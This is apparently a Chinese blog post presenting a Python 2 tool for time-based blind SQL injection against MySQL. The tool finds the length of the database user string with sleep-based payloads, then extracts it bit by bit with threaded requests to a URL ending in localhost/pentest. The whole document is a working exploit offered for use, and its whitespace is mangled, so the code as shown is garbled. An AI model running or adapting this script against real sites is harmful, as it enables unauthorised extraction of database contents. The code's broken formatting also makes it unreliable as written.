mysql延时注入脚本_py延迟注入SQL脚本

#!/usr/bin/env python#-*- coding: utf-8 -*-#延迟注入工具

importurllib2importtimeimportsocketimportthreadingimportrequestsclassmy_threading(threading.Thread):def __init__(self, str,x):

threading.Thread.__init__(self)

self.str=str

self.x=xdefrun(self):globalres

x=self.x

j=self.str

url= "http://localhost/pentest/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"html=request(url)

verify= 'timeout'

if verify not inhtml:

res[str(j)]=0#print 1

else:

res[str(j)]= 1

defrequest(URL):

user_agent= { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}

req=urllib2.Request(URL, None, user_agent)try:

request= urllib2.urlopen(req,timeout=2)exceptException ,e:

time.sleep(2)return 'timeout'

returnrequest.read()defcurl(url):try:

start=time.clock()

requests.get(url)

end=time.clock()returnint(end)exceptrequests.RequestException as e:print u"访问出错!"exit()defgetLength():

i=0whileTrue:print "[+] Checking: %s \r" %i

url= "http://localhost/pentest/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"html=request(url)

verify= 'timeout'

if verify inhtml:print u"[+] 数据长度为： %s" %ireturni

i= i + 1

defbin2dec(string_num):return int(string_num, 2)defgetData(dataLength):globalres

data= ""

for x inrange(dataLength):

x= x + 1

#print x

threads =[]for j in range(8):

result= ""j= j + 1sb=my_threading(j,x)

sb.setDaemon(True)

threads.append(sb)#print j

for t inthreads:

t.start()for t inthreads:

t.join()#print res

tmp = ""

for i in range(8):

tmp= tmp + str(res[str(i+1)])#print chr(bin2dec(tmp))

res ={}

result=chr(bin2dec(tmp))printresult

data= data +result

sb=Noneprint "[+] ok!"

print "[+] result:" +dataif __name__ == '__main__':

stop=False

res={}

length=getLength()

getData(length)